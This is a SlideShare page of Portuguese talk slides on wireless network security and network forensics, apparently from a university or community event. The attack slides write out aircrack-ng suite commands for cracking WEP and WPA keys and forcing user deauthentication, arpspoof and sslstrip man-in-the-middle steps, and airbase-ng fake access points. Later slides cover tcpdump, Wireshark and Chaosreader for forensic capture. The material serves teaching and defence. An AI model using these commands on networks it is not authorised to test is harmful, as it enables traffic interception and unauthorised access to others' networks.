SlideShare une entreprise Scribd logo
1  sur  60
Télécharger pour lire hors ligne
Segurança e Forense em
Redes de Computadores
whoami
Euler Neto
Entusiasta NTI GDG Aracaju
Segurança (UFS São Cristóvão)
Segurança em Redes
de Computadores sem fio
WLAN Frames
WLAN Frames
● Tipos
○ Management: manutenção da comunicação entre o access point
e o cliente
○ Control: troca de dados entre o access point e o cliente
○ Data
WLAN Frames
● Management
○ Authentication
○ De-authentication
○ Association (Request e Response)
○ Reassociation (Request e Response)
○ Disassociation
○ Beacon
○ Probe (Request e Response)
WLAN Frames
● Control Frames
○ Request to Send (RTS)
○ Clear to Send (CTS)
○ Acknowledgement (ACK)
Aircrack-ng
● Conjunto de ferramentas para captura e
análise em redes sem fio
● Principais ferramentas:
○ airmon-ng: ativar modo monitor da interface
○ airodump-ng: captura de dados na rede sem fio
○ aircrack-ng: quebra de chaves
○ aireplay-ng: injetar pacotes na rede sem fio
Interface de rede (NIC)
● Modo Normal: captura tráfego da rede que está associado
● Modo Monitor: captura qualquer dado que circula no ar
Interface de rede (NIC)
● Ativando modo Monitor com o aircrack-ng
#: airmon-ng
Interface Chipset Driver
wlan0 Ralink 2573 USB rt73usb - [phy0]
#: airmon-ng start wlan0
Interface Chipset Driver
wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)
Interface de rede (NIC)
● Ativando modo Monitor com o aircrack-ng
#: airmon-ng
Interface Chipset Driver
wlan0 Ralink 2573 USB rt73usb - [phy0]
mon0 Ralink 2573 USB rt73usb - [phy0]
Criptografia WLAN
● WEP
● WPA / WPA2
Criptografia WLAN
● WEP
○ Foi descoberto como quebrar em 2000
○ Fragilidade pelo IV (vetor de inicialização)
○ Depende de tráfego na rede
○ Quanto mais pacotes capturados, melhor
#: airodump-ng --bssid <endereço MAC do AP> --channel <canal>
--write <arquivo> mon0
Criptografia WLAN
● WEP
○ Processo do airodump-ng
CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP MyNetwork
BSSID STATION PWR Lost Packets Probes
00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782
Criptografia WLAN
● WEP
○ E se não houver tráfego?
○ É possível injetar pacotes para “simular” tráfego
#: aireplay-ng -3 -b <endereço MAC do AP> -h <endereço MAC do
cliente> mon0
Criptografia WLAN
● WEP
○ Processo do aireplay-ng (ARP Request)
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
Criptografia WLAN
● WEP
○ Utilizar aircrack-ng com o arquivo gerado pelo
airodump-ng
○ Se funcionar, a senha da rede será revelada
○ Se não funcionar, repetir todo o processo
capturando mais pacotes
#: aireplay-ng -3 -b [endereço MAC do modem] -h [endereço MAC
do cliente] mon0
#: aircrack-ng <arquivo>
Criptografia WLAN
● WEP
○ Processo do aircrack-ng
Aircrack-ng 0.9
[00:03:06] Tested 674449 keys (got 96610 IVs)
KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)
KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%
Criptografia WLAN
● WPA / WPA2
○ WPA utiliza um algoritmo de segurança mais
robusto (TKIP)
○ WPA2 utiliza um ainda mais robusto (AES-CCMP)
○ Mas ambos são vulneráveis a ataque de dicionário
(WPA-Personal)
Criptografia WLAN
● WPA / WPA2
○ Por que são vulneráveis?
Criptografia WLAN
● WPA / WPA2
○ Também utilizando o airodump-ng
○ Após executar o airodump-ng, esperar por um
handshake
Criptografia WLAN
● WPA / WPA2
○ E se não tiver handshake?
○ Se já tiver algum usuário na rede, o força a
reconectar
○ Se não tiver, infelizmente nada pode ser feito
#: aircrack-ng [arquivo]
#: aireplay-ng --deauth 1 -a <endereço MAC do usuário conectado>
mon0
Criptografia WLAN
● WPA / WPA2
○ Necessita de um bom dicionário
#: aircrack-ng <arquivo> -w <dicionario>
Man-in-the-Middle
● Se colocar entre um cliente e o access point
● Interceptar o tráfego
● Algumas maneiras de fazer:
○ arp spoofing
○ Fake AP
Man-in-the-Middle
● Arp spoofing
○ Funcionamento do protocolo ARP
○ Vulnerabilidade do ARP
○ Explorando a vulnerabilidade
Man-in-the-Middle
● Protocolo ARP
○ ARP Request
Quem é 192.168.1.5?
Quem é 192.168.1.5?
Quem é 192.168.1.5?
192.168.1.5
192.168.1.3
192.168.1.6
Man-in-the-Middle
● Protocolo ARP
○ ARP Reply
Quem é 192.168.1.5?
EU! End. MAC: AA:AA:AA:AA
Quem é 192.168.1.5?
192.168.1.3
192.168.1.6
192.168.1.5
Man-in-the-Middle
● ARP Spoof
○ ARP Request
Quem é 192.168.1.5?
Quem é 192.168.1.5?
Quem é 192.168.1.5?
192.168.1.5
192.168.1.3
192.168.1.6
Quem é 192.168.1.5?
Man-in-the-Middle
● ARP Spoof
○ ARP Reply (O atacante envia o sinal primeiro)
Quem é 192.168.1.5?
Quem é 192.168.1.5?
192.168.1.5
192.168.1.3
192.168.1.6
EU! End. MAC: AA:AA:AA:AA
EU! End. MAC: BB:BB:BB:BB
Man-in-the-Middle
● Por que funciona?
○ Arp spoofing
○ “Engana” o cliente e o access point
○ Ativar encaminhamento de pacotes
#: echo 1 > /proc/sys/net/ipv4/ip_forward
Man-in-the-Middle
● MITM Passivo
○ HTTP
○ Não há alteração de dados
A A
BB
Man-in-the-Middle
● MITM Passivo
○ Arpspoof
#: arpspoof -i wlan0 -t <IP da vítima> <IP do gateway>
#: arpspoof -i wlan0 -t <IP do gateway> <IP da vítima>
Man-in-the-Middle
● MITM Ativo
○ HTTPS
○ Alteração de dados
A C
BD
Man-in-the-Middle
● MITM Ativo
○ Arpspoof + SSL Strip
#: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j
REDIRECT --to-port <porta não reservada>
#: ssltrip -w <arquivo> -l <porta não reservada>
Man-in-the-Middle
● MITM Ativo
○ Resultado: certificado falso
Man-in-the-Middle
● MITM Ativo
○ Por que funciona?
■ Falta de informação do cliente
Man-in-the-Middle
● Fake AP
○ Criar um AP falso pra enganar a vítima
○ Honeypot
○ Cuidado com as redes preferenciais
Man-in-the-Middle
● Fake AP (Honeypot)
○ Atrair a vítima para o AP falso
○ Criar uma rede falsa com:
1. Mesmo ESSID que a vítima está
associada
2. ESSID com um nome falso (ex:
aeroporto, café, …)
Man-in-the-Middle
● Fake AP (Honeypot)
○ Rastrear clientes com airodump-ng
○ Criar o AP falso com airbase-ng
#: airbase-ng --essid <nome do AP> -c <canal> mon0
Man-in-the-Middle
● Fake AP (Honeypot)
○ “Chamar” o cliente
○ Ou aumenta o seu sinal…
○ ...ou diminui o dele (?)
Man-in-the-Middle
● Fake AP
○ aircrack-ng
Análise Forense em Redes
de Computadores sem fio
Conceitos
● Perícia forense: ”suporte técnico ao judiciário,
realizado por pessoas capacitadas, para responder a
quesitos aos quais o judiciário não dispõe de
embasamento suficiente para julgar com precisão”
Conceitos
● Computação forense: ”área da computação
responsável por dar resposta ao judiciário em questões
envolvendo sistemas computacionais”
Conceitos
● Forense em redes: ”captura, armazenamento,
manipulação e análise de dados que trafegam (ou
trafegaram) em redes de computadores como parte de
um processo investigativo”
Grampo digital
● Investigação através de um grampo digital
● Fases:
○ Instalação do grampo
○ Captura de dados
○ Análise de dados
Instalação do grampo
● Procedimento físico: identificar ponto de captura,
técnica utilizada
● Técnicas
○ Monitorar portas
○ Interceptar dados
● Através de portas de monitoramento
Instalação do grampo
A B C D
mensagem
de A para B
B recebe
Sniffer
instalado
D recebe
todo
tráfego
de/para A
● Através de interceptação intermediária
Instalação do grampo
A B C
mensagem
de A para B
B recebe
Sniffer
instalado
D recebe todo tráfego de/para A
D
Instalação do grampo
● Grampo: host associado à rede
● Se não estiver associado
○ Captura em modo monitor
○ Quebra a chave
Captura de dados
● Procedimento lógico: escolha de software,
parâmetros de captura, filtros
● Filtrar dados
○ Wireshark?
○ tcpdump
Captura de dados
● Filtros no tcpdump
○ Por host
○ De um host para outro
#: tcpdump -X -vvv -n -i wlan0 -s0 host <IP> [ and host <IP>]
#: tcpdump -X -vvv -n -i wlan0 -s0 src host <IP> and dst host <IP>
Captura de dados
● Filtros no tcpdump
○ Por porta
○ Gravando em arquivo
#: tcpdump -X -vvv -n -i wlan0 -s0 port <porta> [ and port <porta>]
#: tcpdump -X -vvv -n -i wlan0 -w <arquivo>
Análise de dados
● Identificar conteúdo capturado
● Responder ao judiciário
● Técnicas
○ Casamento de padrões
○ Campos do protocolo
○ Filtragem
Análise de dados
● Wireshark
○ Boa interface
○ Vários recursos
○ Exportação de pacotes (Follow TCP Stream)
● Chaosreader
○ Reconstrói sessão no formato HTML
Análise de dados
● Wireshark
Análise de dados
● Wireshark
○ Follow TCP Stream:
■ Baseado em protocolos TCP
■ Mostra sequência do tráfego
■ Exportação de dados
Análise de dados
● Chaosreader
○ Alguns screenshots: http://www.brendangregg.
com/chaosreader.html
Conclusões
● Vulnerabilidades existem
● Conhecer como se ataca para se defender
● Área forense
Referências
● Ramashadran, Vivek. BackTrack 5 Wireless Penetration
Test: Beginner’s Guide. Packt Publishing, 2011.
● Kléber, Ricardo. Introdução à Análise Forense em
Redes de Computadores: conceitos, técnicase
ferramentas para “grampos digitais”. Novatec, 2013.

Contenu connexe

Tendances

Webinar # 16 – Ataques de Força Bruta – Método Dicionário, Híbridos e Rainbow...
Webinar # 16 – Ataques de Força Bruta – Método Dicionário, Híbridos e Rainbow...Webinar # 16 – Ataques de Força Bruta – Método Dicionário, Híbridos e Rainbow...
Webinar # 16 – Ataques de Força Bruta – Método Dicionário, Híbridos e Rainbow...Clavis Segurança da Informação
 
Explicando segurança e privacidade com Wireshark (2017)
Explicando segurança e privacidade com Wireshark (2017)Explicando segurança e privacidade com Wireshark (2017)
Explicando segurança e privacidade com Wireshark (2017)Euler Neto
 
Protocolo MQTT - Redes de Computadores
Protocolo MQTT - Redes de Computadores Protocolo MQTT - Redes de Computadores
Protocolo MQTT - Redes de Computadores Maurício Moreira Neto
 
Hackeando apps atraves de interceptação de tráfego
Hackeando apps atraves de interceptação de tráfegoHackeando apps atraves de interceptação de tráfego
Hackeando apps atraves de interceptação de tráfegoTobias Sette
 
HTTPS com TLS em Modo RSA
HTTPS com TLS em Modo RSAHTTPS com TLS em Modo RSA
HTTPS com TLS em Modo RSARudá Moura
 
Zabbix + SNMP: Compartilhando experiências sobre SNMP
Zabbix + SNMP: Compartilhando experiências sobre SNMPZabbix + SNMP: Compartilhando experiências sobre SNMP
Zabbix + SNMP: Compartilhando experiências sobre SNMPAndré Déo
 
Minha experiencia como operador de um relay Tor
Minha experiencia como operador de um relay TorMinha experiencia como operador de um relay Tor
Minha experiencia como operador de um relay TorAugusto Amaral
 
Ataque por Shell reverso
Ataque por Shell reversoAtaque por Shell reverso
Ataque por Shell reversoailton bsj
 
Como recuperar senhas WEP de redes wireless com Backtrack
Como recuperar senhas WEP de redes wireless com BacktrackComo recuperar senhas WEP de redes wireless com Backtrack
Como recuperar senhas WEP de redes wireless com BacktrackNatanael Simões
 
Disponibilização de Serviços em IPv6 na UCS - Um Caso Prático
Disponibilização de Serviços em IPv6 na UCS - Um Caso PráticoDisponibilização de Serviços em IPv6 na UCS - Um Caso Prático
Disponibilização de Serviços em IPv6 na UCS - Um Caso PráticoJeronimo Zucco
 
Configurando um servidor
Configurando um servidorConfigurando um servidor
Configurando um servidorTiago
 

Tendances (13)

Webinar # 16 – Ataques de Força Bruta – Método Dicionário, Híbridos e Rainbow...
Webinar # 16 – Ataques de Força Bruta – Método Dicionário, Híbridos e Rainbow...Webinar # 16 – Ataques de Força Bruta – Método Dicionário, Híbridos e Rainbow...
Webinar # 16 – Ataques de Força Bruta – Método Dicionário, Híbridos e Rainbow...
 
Explicando segurança e privacidade com Wireshark (2017)
Explicando segurança e privacidade com Wireshark (2017)Explicando segurança e privacidade com Wireshark (2017)
Explicando segurança e privacidade com Wireshark (2017)
 
Protocolo MQTT - Redes de Computadores
Protocolo MQTT - Redes de Computadores Protocolo MQTT - Redes de Computadores
Protocolo MQTT - Redes de Computadores
 
Hackeando apps atraves de interceptação de tráfego
Hackeando apps atraves de interceptação de tráfegoHackeando apps atraves de interceptação de tráfego
Hackeando apps atraves de interceptação de tráfego
 
HTTPS com TLS em Modo RSA
HTTPS com TLS em Modo RSAHTTPS com TLS em Modo RSA
HTTPS com TLS em Modo RSA
 
Zabbix + SNMP: Compartilhando experiências sobre SNMP
Zabbix + SNMP: Compartilhando experiências sobre SNMPZabbix + SNMP: Compartilhando experiências sobre SNMP
Zabbix + SNMP: Compartilhando experiências sobre SNMP
 
Automatizando Nmap com NSE
Automatizando Nmap com NSEAutomatizando Nmap com NSE
Automatizando Nmap com NSE
 
Minha experiencia como operador de um relay Tor
Minha experiencia como operador de um relay TorMinha experiencia como operador de um relay Tor
Minha experiencia como operador de um relay Tor
 
Ataque por Shell reverso
Ataque por Shell reversoAtaque por Shell reverso
Ataque por Shell reverso
 
Como recuperar senhas WEP de redes wireless com Backtrack
Como recuperar senhas WEP de redes wireless com BacktrackComo recuperar senhas WEP de redes wireless com Backtrack
Como recuperar senhas WEP de redes wireless com Backtrack
 
Disponibilização de Serviços em IPv6 na UCS - Um Caso Prático
Disponibilização de Serviços em IPv6 na UCS - Um Caso PráticoDisponibilização de Serviços em IPv6 na UCS - Um Caso Prático
Disponibilização de Serviços em IPv6 na UCS - Um Caso Prático
 
Configurando um servidor
Configurando um servidorConfigurando um servidor
Configurando um servidor
 
Proxychains HowTo
Proxychains HowToProxychains HowTo
Proxychains HowTo
 

En vedette

En vedette (9)

Guerra De Comando E Controle Final
Guerra De Comando E Controle FinalGuerra De Comando E Controle Final
Guerra De Comando E Controle Final
 
Segurança de redes
Segurança de redesSegurança de redes
Segurança de redes
 
Palestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de RedesPalestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de Redes
 
Fundamentos de Segurança da Informação
Fundamentos de Segurança da InformaçãoFundamentos de Segurança da Informação
Fundamentos de Segurança da Informação
 
Seguranca em Redes IDS
Seguranca em Redes IDSSeguranca em Redes IDS
Seguranca em Redes IDS
 
Criptografias e segurança de redes
Criptografias e segurança de redesCriptografias e segurança de redes
Criptografias e segurança de redes
 
Configurando as ferramentas do Windows Server 2008
Configurando as ferramentas do Windows Server 2008Configurando as ferramentas do Windows Server 2008
Configurando as ferramentas do Windows Server 2008
 
Hackeando Mentes - Engenharia Social
Hackeando Mentes - Engenharia SocialHackeando Mentes - Engenharia Social
Hackeando Mentes - Engenharia Social
 
Infraestrutura de Redes
Infraestrutura de RedesInfraestrutura de Redes
Infraestrutura de Redes
 

Similaire à Segurança e Forense em Redes de Computadores

Disciplina_Redes e Segurança de Sistemas - Mapeamento de Redes
Disciplina_Redes e Segurança de Sistemas - Mapeamento de RedesDisciplina_Redes e Segurança de Sistemas - Mapeamento de Redes
Disciplina_Redes e Segurança de Sistemas - Mapeamento de RedesRogério Almeida
 
Introdução a Software-defined Networks
Introdução a Software-defined NetworksIntrodução a Software-defined Networks
Introdução a Software-defined Networkscaixamagicasoftware
 
DoS: Negação de Serviço e formas de defesa - Elgio Schlemer
DoS: Negação de Serviço e formas de defesa - Elgio SchlemerDoS: Negação de Serviço e formas de defesa - Elgio Schlemer
DoS: Negação de Serviço e formas de defesa - Elgio SchlemerTchelinux
 
Manobras Evasivas: Técnicas de Evasão para Varreduras com o Nmap
Manobras Evasivas: Técnicas de Evasão para Varreduras com o NmapManobras Evasivas: Técnicas de Evasão para Varreduras com o Nmap
Manobras Evasivas: Técnicas de Evasão para Varreduras com o NmapClavis Segurança da Informação
 
Mini-Curso de Sockets no Unipê
Mini-Curso de Sockets no UnipêMini-Curso de Sockets no Unipê
Mini-Curso de Sockets no UnipêElenilson Vieira
 
Mini Curso - Pen Test - Univem
Mini Curso - Pen Test - UnivemMini Curso - Pen Test - Univem
Mini Curso - Pen Test - Univemevandrovv
 
Camada de transporte capitulo 3
Camada de transporte   capitulo 3Camada de transporte   capitulo 3
Camada de transporte capitulo 3fernandao777
 
Segurança em redes sem fio 2
Segurança em redes sem fio 2Segurança em redes sem fio 2
Segurança em redes sem fio 2Designer Info
 
Ferramentas hack wifi aircrack
Ferramentas hack wifi aircrackFerramentas hack wifi aircrack
Ferramentas hack wifi aircrackPedro Verissimo
 
Sistemas operacionais 14
Sistemas operacionais 14Sistemas operacionais 14
Sistemas operacionais 14Nauber Gois
 
Aula 8.3 - Iptables Tabela NAT
Aula 8.3 - Iptables Tabela NATAula 8.3 - Iptables Tabela NAT
Aula 8.3 - Iptables Tabela NATAndrei Carniel
 
[CLASS 2014] Palestra Técnica - Marcelo Branquinho e Jan Seidl
[CLASS 2014] Palestra Técnica - Marcelo Branquinho e Jan Seidl[CLASS 2014] Palestra Técnica - Marcelo Branquinho e Jan Seidl
[CLASS 2014] Palestra Técnica - Marcelo Branquinho e Jan SeidlTI Safe
 
Vulnerabilidades em Redes Wifi
Vulnerabilidades em Redes WifiVulnerabilidades em Redes Wifi
Vulnerabilidades em Redes WifiDavid de Assis
 
Ultrasurf - Entendendo e bloqueando
Ultrasurf - Entendendo e bloqueandoUltrasurf - Entendendo e bloqueando
Ultrasurf - Entendendo e bloqueandomarcusburghardt
 

Similaire à Segurança e Forense em Redes de Computadores (20)

Disciplina_Redes e Segurança de Sistemas - Mapeamento de Redes
Disciplina_Redes e Segurança de Sistemas - Mapeamento de RedesDisciplina_Redes e Segurança de Sistemas - Mapeamento de Redes
Disciplina_Redes e Segurança de Sistemas - Mapeamento de Redes
 
Introdução a Software-defined Networks
Introdução a Software-defined NetworksIntrodução a Software-defined Networks
Introdução a Software-defined Networks
 
DoS: Negação de Serviço e formas de defesa - Elgio Schlemer
DoS: Negação de Serviço e formas de defesa - Elgio SchlemerDoS: Negação de Serviço e formas de defesa - Elgio Schlemer
DoS: Negação de Serviço e formas de defesa - Elgio Schlemer
 
Manobras Evasivas: Técnicas de Evasão para Varreduras com o Nmap
Manobras Evasivas: Técnicas de Evasão para Varreduras com o NmapManobras Evasivas: Técnicas de Evasão para Varreduras com o Nmap
Manobras Evasivas: Técnicas de Evasão para Varreduras com o Nmap
 
Mini-Curso de Sockets no Unipê
Mini-Curso de Sockets no UnipêMini-Curso de Sockets no Unipê
Mini-Curso de Sockets no Unipê
 
Mini Curso - Pen Test - Univem
Mini Curso - Pen Test - UnivemMini Curso - Pen Test - Univem
Mini Curso - Pen Test - Univem
 
Webinar # 21 – Análise Forense de Redes
 Webinar # 21 – Análise Forense de Redes Webinar # 21 – Análise Forense de Redes
Webinar # 21 – Análise Forense de Redes
 
Camada de transporte capitulo 3
Camada de transporte   capitulo 3Camada de transporte   capitulo 3
Camada de transporte capitulo 3
 
Segurança em redes sem fio 2
Segurança em redes sem fio 2Segurança em redes sem fio 2
Segurança em redes sem fio 2
 
MRTG - SNMP na Prática
MRTG - SNMP na PráticaMRTG - SNMP na Prática
MRTG - SNMP na Prática
 
Unidade 2.2.1 nmap
Unidade 2.2.1 nmapUnidade 2.2.1 nmap
Unidade 2.2.1 nmap
 
Ferramentas hack wifi aircrack
Ferramentas hack wifi aircrackFerramentas hack wifi aircrack
Ferramentas hack wifi aircrack
 
03 seguranca redesi-pv6
03 seguranca redesi-pv603 seguranca redesi-pv6
03 seguranca redesi-pv6
 
Sistemas operacionais 14
Sistemas operacionais 14Sistemas operacionais 14
Sistemas operacionais 14
 
Aula 8.3 - Iptables Tabela NAT
Aula 8.3 - Iptables Tabela NATAula 8.3 - Iptables Tabela NAT
Aula 8.3 - Iptables Tabela NAT
 
Webcast Luiz Vieira criptografia on-the-fly com software livre
Webcast Luiz Vieira criptografia on-the-fly com software livreWebcast Luiz Vieira criptografia on-the-fly com software livre
Webcast Luiz Vieira criptografia on-the-fly com software livre
 
[CLASS 2014] Palestra Técnica - Marcelo Branquinho e Jan Seidl
[CLASS 2014] Palestra Técnica - Marcelo Branquinho e Jan Seidl[CLASS 2014] Palestra Técnica - Marcelo Branquinho e Jan Seidl
[CLASS 2014] Palestra Técnica - Marcelo Branquinho e Jan Seidl
 
Vulnerabilidades em Redes Wifi
Vulnerabilidades em Redes WifiVulnerabilidades em Redes Wifi
Vulnerabilidades em Redes Wifi
 
Ultrasurf - Entendendo e bloqueando
Ultrasurf - Entendendo e bloqueandoUltrasurf - Entendendo e bloqueando
Ultrasurf - Entendendo e bloqueando
 
02-Flowspec_GTER29
02-Flowspec_GTER2902-Flowspec_GTER29
02-Flowspec_GTER29
 

Plus de Euler Neto

Investigando transacciones sospechosas de bitcoins con OSINT
Investigando transacciones sospechosas de bitcoins con OSINTInvestigando transacciones sospechosas de bitcoins con OSINT
Investigando transacciones sospechosas de bitcoins con OSINTEuler Neto
 
Forense em Computação na Nuvem
Forense em Computação na NuvemForense em Computação na Nuvem
Forense em Computação na NuvemEuler Neto
 
Adding Secure Development to your system integrations
Adding Secure Development to your system integrationsAdding Secure Development to your system integrations
Adding Secure Development to your system integrationsEuler Neto
 
Open Source - A maior arma contra a vigilância
Open Source - A maior arma contra a vigilânciaOpen Source - A maior arma contra a vigilância
Open Source - A maior arma contra a vigilânciaEuler Neto
 
Explicando segurança e privacidade utilizando Wireshark
Explicando segurança e privacidade utilizando WiresharkExplicando segurança e privacidade utilizando Wireshark
Explicando segurança e privacidade utilizando WiresharkEuler Neto
 
Segurança no Android
Segurança no AndroidSegurança no Android
Segurança no AndroidEuler Neto
 

Plus de Euler Neto (6)

Investigando transacciones sospechosas de bitcoins con OSINT
Investigando transacciones sospechosas de bitcoins con OSINTInvestigando transacciones sospechosas de bitcoins con OSINT
Investigando transacciones sospechosas de bitcoins con OSINT
 
Forense em Computação na Nuvem
Forense em Computação na NuvemForense em Computação na Nuvem
Forense em Computação na Nuvem
 
Adding Secure Development to your system integrations
Adding Secure Development to your system integrationsAdding Secure Development to your system integrations
Adding Secure Development to your system integrations
 
Open Source - A maior arma contra a vigilância
Open Source - A maior arma contra a vigilânciaOpen Source - A maior arma contra a vigilância
Open Source - A maior arma contra a vigilância
 
Explicando segurança e privacidade utilizando Wireshark
Explicando segurança e privacidade utilizando WiresharkExplicando segurança e privacidade utilizando Wireshark
Explicando segurança e privacidade utilizando Wireshark
 
Segurança no Android
Segurança no AndroidSegurança no Android
Segurança no Android
 

Segurança e Forense em Redes de Computadores

  • 1. Segurança e Forense em Redes de Computadores
  • 2. whoami Euler Neto Entusiasta NTI GDG Aracaju Segurança (UFS São Cristóvão)
  • 3. Segurança em Redes de Computadores sem fio
  • 5. WLAN Frames ● Tipos ○ Management: manutenção da comunicação entre o access point e o cliente ○ Control: troca de dados entre o access point e o cliente ○ Data
  • 6. WLAN Frames ● Management ○ Authentication ○ De-authentication ○ Association (Request e Response) ○ Reassociation (Request e Response) ○ Disassociation ○ Beacon ○ Probe (Request e Response)
  • 7. WLAN Frames ● Control Frames ○ Request to Send (RTS) ○ Clear to Send (CTS) ○ Acknowledgement (ACK)
  • 8. Aircrack-ng ● Conjunto de ferramentas para captura e análise em redes sem fio ● Principais ferramentas: ○ airmon-ng: ativar modo monitor da interface ○ airodump-ng: captura de dados na rede sem fio ○ aircrack-ng: quebra de chaves ○ aireplay-ng: injetar pacotes na rede sem fio
  • 9. Interface de rede (NIC) ● Modo Normal: captura tráfego da rede que está associado ● Modo Monitor: captura qualquer dado que circula no ar
  • 10. Interface de rede (NIC) ● Ativando modo Monitor com o aircrack-ng #: airmon-ng Interface Chipset Driver wlan0 Ralink 2573 USB rt73usb - [phy0] #: airmon-ng start wlan0 Interface Chipset Driver wlan0 Ralink 2573 USB rt73usb - [phy0] (monitor mode enabled on mon0)
  • 11. Interface de rede (NIC) ● Ativando modo Monitor com o aircrack-ng #: airmon-ng Interface Chipset Driver wlan0 Ralink 2573 USB rt73usb - [phy0] mon0 Ralink 2573 USB rt73usb - [phy0]
  • 13. Criptografia WLAN ● WEP ○ Foi descoberto como quebrar em 2000 ○ Fragilidade pelo IV (vetor de inicialização) ○ Depende de tráfego na rede ○ Quanto mais pacotes capturados, melhor #: airodump-ng --bssid <endereço MAC do AP> --channel <canal> --write <arquivo> mon0
  • 14. Criptografia WLAN ● WEP ○ Processo do airodump-ng CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP MyNetwork BSSID STATION PWR Lost Packets Probes 00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782
  • 15. Criptografia WLAN ● WEP ○ E se não houver tráfego? ○ É possível injetar pacotes para “simular” tráfego #: aireplay-ng -3 -b <endereço MAC do AP> -h <endereço MAC do cliente> mon0
  • 16. Criptografia WLAN ● WEP ○ Processo do aireplay-ng (ARP Request) Saving ARP requests in replay_arp-0321-191525.cap You should also start airodump-ng to capture replies. Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
  • 17. Criptografia WLAN ● WEP ○ Utilizar aircrack-ng com o arquivo gerado pelo airodump-ng ○ Se funcionar, a senha da rede será revelada ○ Se não funcionar, repetir todo o processo capturando mais pacotes #: aireplay-ng -3 -b [endereço MAC do modem] -h [endereço MAC do cliente] mon0 #: aircrack-ng <arquivo>
  • 18. Criptografia WLAN ● WEP ○ Processo do aircrack-ng Aircrack-ng 0.9 [00:03:06] Tested 674449 keys (got 96610 IVs) KB depth byte(vote) 0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0) 1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12) 2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10) 3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15) KEY FOUND! [ 12:34:56:78:90 ] Probability: 100%
  • 19. Criptografia WLAN ● WPA / WPA2 ○ WPA utiliza um algoritmo de segurança mais robusto (TKIP) ○ WPA2 utiliza um ainda mais robusto (AES-CCMP) ○ Mas ambos são vulneráveis a ataque de dicionário (WPA-Personal)
  • 20. Criptografia WLAN ● WPA / WPA2 ○ Por que são vulneráveis?
  • 21. Criptografia WLAN ● WPA / WPA2 ○ Também utilizando o airodump-ng ○ Após executar o airodump-ng, esperar por um handshake
  • 22. Criptografia WLAN ● WPA / WPA2 ○ E se não tiver handshake? ○ Se já tiver algum usuário na rede, o força a reconectar ○ Se não tiver, infelizmente nada pode ser feito #: aircrack-ng [arquivo] #: aireplay-ng --deauth 1 -a <endereço MAC do usuário conectado> mon0
  • 23. Criptografia WLAN ● WPA / WPA2 ○ Necessita de um bom dicionário #: aircrack-ng <arquivo> -w <dicionario>
  • 24. Man-in-the-Middle ● Se colocar entre um cliente e o access point ● Interceptar o tráfego ● Algumas maneiras de fazer: ○ arp spoofing ○ Fake AP
  • 25. Man-in-the-Middle ● Arp spoofing ○ Funcionamento do protocolo ARP ○ Vulnerabilidade do ARP ○ Explorando a vulnerabilidade
  • 26. Man-in-the-Middle ● Protocolo ARP ○ ARP Request Quem é 192.168.1.5? Quem é 192.168.1.5? Quem é 192.168.1.5? 192.168.1.5 192.168.1.3 192.168.1.6
  • 27. Man-in-the-Middle ● Protocolo ARP ○ ARP Reply Quem é 192.168.1.5? EU! End. MAC: AA:AA:AA:AA Quem é 192.168.1.5? 192.168.1.3 192.168.1.6 192.168.1.5
  • 28. Man-in-the-Middle ● ARP Spoof ○ ARP Request Quem é 192.168.1.5? Quem é 192.168.1.5? Quem é 192.168.1.5? 192.168.1.5 192.168.1.3 192.168.1.6 Quem é 192.168.1.5?
  • 29. Man-in-the-Middle ● ARP Spoof ○ ARP Reply (O atacante envia o sinal primeiro) Quem é 192.168.1.5? Quem é 192.168.1.5? 192.168.1.5 192.168.1.3 192.168.1.6 EU! End. MAC: AA:AA:AA:AA EU! End. MAC: BB:BB:BB:BB
  • 30. Man-in-the-Middle ● Por que funciona? ○ Arp spoofing ○ “Engana” o cliente e o access point ○ Ativar encaminhamento de pacotes #: echo 1 > /proc/sys/net/ipv4/ip_forward
  • 31. Man-in-the-Middle ● MITM Passivo ○ HTTP ○ Não há alteração de dados A A BB
  • 32. Man-in-the-Middle ● MITM Passivo ○ Arpspoof #: arpspoof -i wlan0 -t <IP da vítima> <IP do gateway> #: arpspoof -i wlan0 -t <IP do gateway> <IP da vítima>
  • 33. Man-in-the-Middle ● MITM Ativo ○ HTTPS ○ Alteração de dados A C BD
  • 34. Man-in-the-Middle ● MITM Ativo ○ Arpspoof + SSL Strip #: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <porta não reservada> #: ssltrip -w <arquivo> -l <porta não reservada>
  • 35. Man-in-the-Middle ● MITM Ativo ○ Resultado: certificado falso
